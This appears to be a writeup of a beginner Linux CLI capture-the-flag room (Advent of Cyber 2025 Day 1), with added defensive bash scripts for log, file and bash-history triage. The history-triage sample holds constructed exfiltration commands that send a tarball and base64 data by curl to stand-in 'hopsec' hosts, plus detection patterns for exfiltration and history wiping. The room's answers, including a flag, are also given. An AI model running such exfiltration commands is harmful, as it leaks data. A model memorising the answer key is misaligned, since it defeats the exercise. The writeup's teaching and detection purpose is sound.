Linux CLI — Shells Bells | Advent of Cyber 2025 Day 1 | Writeup | kidnapshadow

 Access the room: https://tryhackme.com/room/linuxcli-aoc2025-o1fpqkvxti



The unthinkable has happened — McSkidy has been kidnapped. Without her, Wareville’s defenses are faltering, and Christmas itself hangs by a thread. But panic won’t save the season. A long road lies ahead to uncover what truly happened. The TBFC (The Best Festival Company) team already brainstorms what to do next, and their first lead points to the tbfc-web01, a Linux server processing Christmas wishlists. Somewhere within its data may lie the truth: traces of McSkidy’s final actions, or perhaps the clues to King Malhare’s twisted vision for EASTMAS.

Learning Objectives

  • Learn the basics of the Linux command-line interface (CLI)
  • Explore its use for personal objectives and IT administration
  • Apply your knowledge to unveil the Christmas mysteries

This room introduces fundamental Linux command-line interface (CLI) operations through a Christmas-themed investigation where McSkidy has been kidnapped. The challenge involves analyzing a compromised server (tbfc-web01) to uncover traces of an attack orchestrated by HopSec Island's King Malhare and Sir Carrotbane.

Initial Access

After starting the machine, I connected to the virtual environment and landed in McSkidy’s home directory at /home/mcskidy.

First Commands:

echo "Hello World!"   # print a string to the terminal
ls                    # list the current directory
cat README.txt        # print a file's contents

The README.txt revealed that McSkidy discovered an "Eggsploit" on their servers and planned to write a security guide while hiding it from plain view.

Task 1: Finding the Hidden Guide

Question: Which CLI command would you use to list a directory?
Answer: ls

Navigating to the Guides directory initially showed no files:

cd Guides
ls

However, adding the -a flag (show all entries, including names beginning with a dot, which ls hides by default; -l adds the long listing with owner and permissions) revealed the secret guide:

ls -la
cat .guide.txt

Question: What flag did you see inside of McSkidy’s guide?
Answer: [Found in .guide.txt - specific flag value visible when examining the file]


The guide instructed checking /var/log/ and using grep to search inside logs for suspicious activity.


Task 2: Log Analysis

Question: Which command helped you filter the logs for failed logins?
Answer: grep

I navigated to the logs directory and searched for failed authentication attempts:

cd /var/log
grep "Failed password" auth.log

This revealed multiple failed login attempts against the "socmas" account, originating from eggbox-196.hopsec. Note that grep is case-sensitive by default (-i relaxes that), and -c prints a count instead of the matching lines.
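To make the grep step concrete, here is an added triage script (my own, not part of the room) run over a few constructed auth.log lines in sshd's usual format. The host name eggbox-196.hopsec comes from the writeup; the timestamps, PIDs, user names and the 10.10.1.5 address are made up. It goes one step past the single grep: it tallies failures per source host and then checks whether any of those sources later got an "Accepted" login, which is the case an analyst actually cares about.

```bash
#!/usr/bin/env bash
# Added example (not from the room): grep-based triage of sshd auth failures.
# The log lines below are constructed to mirror sshd's format; only the host
# eggbox-196.hopsec appears in the writeup, everything else is invented.

SAMPLE_LOG="$(mktemp)"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Dec  1 09:12:01 tbfc-web01 sshd[2101]: Failed password for socmas from eggbox-196.hopsec port 51022 ssh2
Dec  1 09:12:04 tbfc-web01 sshd[2101]: Failed password for socmas from eggbox-196.hopsec port 51023 ssh2
Dec  1 09:12:09 tbfc-web01 sshd[2103]: Failed password for invalid user admin from eggbox-196.hopsec port 51030 ssh2
Dec  1 09:15:44 tbfc-web01 sshd[2110]: Accepted password for socmas from eggbox-196.hopsec port 51100 ssh2
Dec  1 10:01:13 tbfc-web01 sshd[2200]: Accepted publickey for mcskidy from 10.10.1.5 port 40022 ssh2
EOF

# Number of failed password attempts in the given log file.
count_failed() { grep -c 'Failed password' "$1"; }

# Per-source tally, "count host" per line, busiest first. The host is taken
# from the token after "from" rather than a fixed field number, so the
# "invalid user <name>" variant (which shifts the fields) still parses.
failed_by_source() {
  grep 'Failed password' "$1" \
    | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1) }' \
    | sort | uniq -c | sort -rn
}

# Successful logins from a source that also produced failures: a brute force
# that eventually worked. grep may legitimately find nothing for a host, so
# its non-zero status is ignored.
successes_after_failures() {
  local log="$1" host
  failed_by_source "$log" | awk '{ print $2 }' | while read -r host; do
    grep "Accepted .* from ${host} " "$log" || true
  done
}

echo "failed logins: $(count_failed "$SAMPLE_LOG")"
echo "== failures by source =="; failed_by_source "$SAMPLE_LOG"
echo "== successes from those sources =="; successes_after_failures "$SAMPLE_LOG"
```

On a real host, point the functions at /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL family); the "Accepted" check is what turns a noisy brute-force list into a lead worth chasing.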

Task 3: File Discovery

Using the find command to locate suspicious files with "egg" in their names (the pattern is quoted so the shell does not expand it against the current directory before find sees it):

find /home/socmas -name '*egg*'

This discovered /home/socmas/2025/eggstrike.sh - a malicious shell script.
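The following is an added example, not part of the room, covering both the hidden-guide step (Task 1) and this find step. It builds a throwaway directory tree so it runs offline, then shows two things the single find command glosses over: why the -name pattern has to be quoted, and how one find invocation can sweep every home directory for dotfiles and "egg"-named files at once. All paths and file names in it are constructed; only the *egg* pattern and the idea of a dotfile guide come from the writeup.

```bash
#!/usr/bin/env bash
# Added example, not part of the room. Constructed tree: a dotfile guide under
# mcskidy, an eggstrike.sh under socmas, and a decoy file in the directory we
# run find from.

SANDBOX="$(mktemp -d)"
trap 'rm -rf "$SANDBOX"' EXIT

mkdir -p "$SANDBOX/home/mcskidy/Guides" "$SANDBOX/home/socmas/2025" "$SANDBOX/cwd"
printf 'THM{placeholder}\n' > "$SANDBOX/home/mcskidy/Guides/.guide.txt"
printf '#!/bin/bash\n'     > "$SANDBOX/home/socmas/2025/eggstrike.sh"
: > "$SANDBOX/home/socmas/notes.txt"
: > "$SANDBOX/cwd/nutmegg.txt"   # sits in the directory we run find *from*

# Unquoted: bash expands *egg* against the current directory before find
# runs, so find is handed "-name nutmegg.txt" and looks for that exact name.
# Had nothing in cwd matched, the glob would have been passed through
# literally and the command would have "worked", so the bug is silent.
# Echoes the number of hits.
find_unquoted() {
  (cd "$SANDBOX/cwd" && find "$SANDBOX/home/socmas" -name *egg* | wc -l | tr -d ' ')
}

# Quoted: find receives the pattern itself and applies it in every directory.
find_quoted() {
  (cd "$SANDBOX/cwd" && find "$SANDBOX/home/socmas" -name '*egg*' | wc -l | tr -d ' ')
}

# One sweep over all home directories: regular files that are dotfiles or
# have "egg" anywhere in the name (case-insensitive), minus the dotfiles
# every account has. Paths are printed relative to the sandbox.
sweep() {
  find "$SANDBOX/home" -type f \( -name '.*' -o -iname '*egg*' \) \
       ! -name '.bashrc' ! -name '.profile' ! -name '.bash_logout' \
    | sed "s|^$SANDBOX||" | sort
}

echo "unquoted hits: $(find_unquoted)"
echo "quoted hits:   $(find_quoted)"
echo "== sweep =="; sweep
```

On a real box, replace "$SANDBOX/home" with /home (and add /root once you have it) and extend the exclusion list to whatever dotfiles are standard on that image; anything left over is worth a cat.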

Task 4: Analyzing the Attack

Question: What flag did you see inside the Eggstrike script?
Answer: [Found in eggstrike.sh header]

Examining the eggstrike script revealed the attack methodology:

cd /home/socmas/2025
cat eggstrike.sh

The script performed three malicious operations:

  • Extracted unique wishlist items to /tmp/dump.txt using pipe operators (|)
  • Deleted the original wishlist.txt
  • Replaced it with eastmas.txt containing fake EASTMAS wishes

This demonstrated further CLI features: pipes (|), which feed one command's output into the next; output redirection (>), which truncates the target file before writing to it; and conditional execution (&&), which runs each later command only if the previous one succeeded.
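An added example, not the room's eggstrike.sh: it replays, in a scratch directory, the three operations the writeup attributes to the script (dedupe the wishlist into a dump file, delete the original, drop in the EASTMAS version), and then shows what && actually guarantees when the first link of the chain is a pipeline. The wishlist entries and the eastmas.txt contents are constructed.

```bash
#!/usr/bin/env bash
# Added example, not the room's script. Replays the described chain on
# constructed data and then probes its failure behaviour.

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
cd "$WORK"

# Constructed inputs: a wishlist with duplicates and the replacement text.
seed() {
  printf '%s\n' bike drone bike scarf drone drone > wishlist.txt
  printf '%s\n' 'carrot cake' 'egg hunt kit'      > eastmas.txt
}

# The chain. "|" feeds sort's output to uniq; ">" truncates (or creates)
# dump.txt before uniq even starts; "&&" runs each later step only when the
# previous one returned 0. STEPS records which steps actually ran.
run_chain() {
  local src="$1"
  STEPS=""
  sort "$src" 2>/dev/null | uniq > dump.txt && STEPS="$STEPS dump" \
    && rm -- "$src" 2>/dev/null && STEPS="$STEPS rm" \
    && cp eastmas.txt "$src" && STEPS="$STEPS cp"
}

# Number of unique items the pipeline captured.
dump_count() { wc -l < dump.txt | tr -d ' '; }

# Seed, run the chain, report "<steps>|<unique count>|<first line of wishlist now>".
replay() {
  seed
  run_chain wishlist.txt
  echo "${STEPS# }|$(dump_count)|$(head -n 1 wishlist.txt)"
}

# Run the chain in a subshell, with or without pipefail, against any file,
# and report "<exit status>:<steps that ran>".
chain_status() {
  ( [ "$1" = on ] && set -o pipefail
    rc=0; run_chain "$2" || rc=$?
    echo "$rc:${STEPS# }" )
}

echo "happy path -> $(replay)"

# Same chain against a file that does not exist. Without pipefail the
# pipeline's status is uniq's (0), so sort's failure is masked: dump.txt is
# truncated to nothing and the chain only stops at rm. With pipefail the
# pipeline itself fails and nothing after it runs.
echo "no pipefail -> $(chain_status off missing.txt)"
echo "pipefail    -> $(chain_status on missing.txt)"
```

The takeaway for reading attacker scripts: a `>` has already emptied its target by the time you see any error, and an `&&` after a pipeline only reacts to the last command in that pipeline unless the script set pipefail.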


Task 5: Privilege Escalation

Question: Which command would you run to switch to the root user?
Answer: sudo su

Escalating to root (sudo su works here because the account is allowed to run commands through sudo, so this is an administrative switch rather than an exploit; sudo -i gives an equivalent root login shell):

sudo su
whoami

Task 6: Bash History Analysis

Question: Finally, what flag did Sir Carrotbane leave in the root bash history?
Answer: [Found in /root/.bash_history]

Examining the root user’s command history revealed exfiltration attempts:

cd /root
cat .bash_history

or, from inside the root shell,

history

The two are not the same record: .bash_history is what earlier shells wrote to disk (by default bash appends on exit), while history lists the current shell's in-memory entries, so a session that was cleared with history -c or never exited cleanly can differ from the file.

The history showed curl commands uploading stolen data to files.hopsec and sending encoded reports to red.hopsec.
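As an added example that is not part of the room, here is a first-pass triage of a bash history file for data-moving commands. The history lines are constructed to resemble what the writeup describes (a curl upload to files.hopsec and an encoded report to red.hopsec); the exact commands on the room's machine are not reproduced, and the paths, flags and the history -c line are invented for illustration.

```bash
#!/usr/bin/env bash
# Added example, not part of the room: triage of a bash history file.
# HIST is a constructed sample; only the two hopsec host names come from the
# writeup.

HIST="$(mktemp)"
trap 'rm -f "$HIST"' EXIT
cat > "$HIST" <<'EOF'
whoami
cd /home/socmas/2025
./eggstrike.sh
tar czf /tmp/wishes.tgz /home/socmas/2025
curl -F "file=@/tmp/wishes.tgz" https://files.hopsec/upload
cat /tmp/dump.txt | base64 -w0 | curl -s -X POST -d @- https://red.hopsec/report
history -c
EOF

# Lines that move data off the host: curl/wget with an upload or body flag,
# scp/rsync to a remote, netcat to a port. Printed with their line number so
# findings can be cited.
exfil_lines() {
  grep -nE '(curl|wget).*(-F |-T |--upload-file|-d |--data|-X POST)|scp .*@|rsync .*:|nc .* [0-9]+' "$1"
}

# Destination hosts named in those lines (URL hosts and user@host: targets),
# deduplicated. These are the indicators to pivot on in DNS and proxy logs.
exfil_hosts() {
  exfil_lines "$1" \
    | grep -oE 'https?://[A-Za-z0-9.-]+|[A-Za-z0-9._-]+@[A-Za-z0-9.-]+:' \
    | sed -E 's#^https?://##; s#^[^@]*@##; s#:$##' \
    | sort -u
}

# Commands that tamper with the record itself. A hit here means the history
# you are reading is at best partial, so corroborate with other artefacts.
antiforensics() {
  grep -nE 'history -c|unset HISTFILE|HISTFILE=|HISTSIZE=0|shred |bash_history' "$1"
}

echo "== data-moving commands =="; exfil_lines "$HIST"
echo "== destinations ==";         exfil_hosts "$HIST"
echo "== history tampering ==";    antiforensics "$HIST"
```

Run it against /root/.bash_history and every /home/*/.bash_history on the box; because the file is written when a shell exits, also check whether any root shell is still open, since its commands are not on disk yet.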


Lab Answers

Which CLI command would you use to list a directory?

ls.

— — — — — — — — — — — — — — —

Which command helped you filter the logs for failed logins?

grep.

— — — — — — — — — — — — — — —

Which command would you run to switch to the root user?

sudo su.

— — — — — — — — — — — — — — —

Finally, what flag did Sir Carrotbane leave in the root bash history?

THM{until-we-meet-again}.

Key Takeaways

This lab effectively demonstrated essential Linux CLI skills including:

  • Basic navigation (cd, pwd, ls)
  • File manipulation (cat, find)
  • Log analysis with grep
  • Understanding hidden files (. prefix)
  • Privilege escalation concepts
  • Forensic investigation through bash history

The storytelling approach made learning command-line fundamentals engaging while building practical cybersecurity investigation skills.

Join Advent of Cyber 2025

TryHackMe | Advent of Cyber 2025: Free 24-Day Cyber Security Challenge
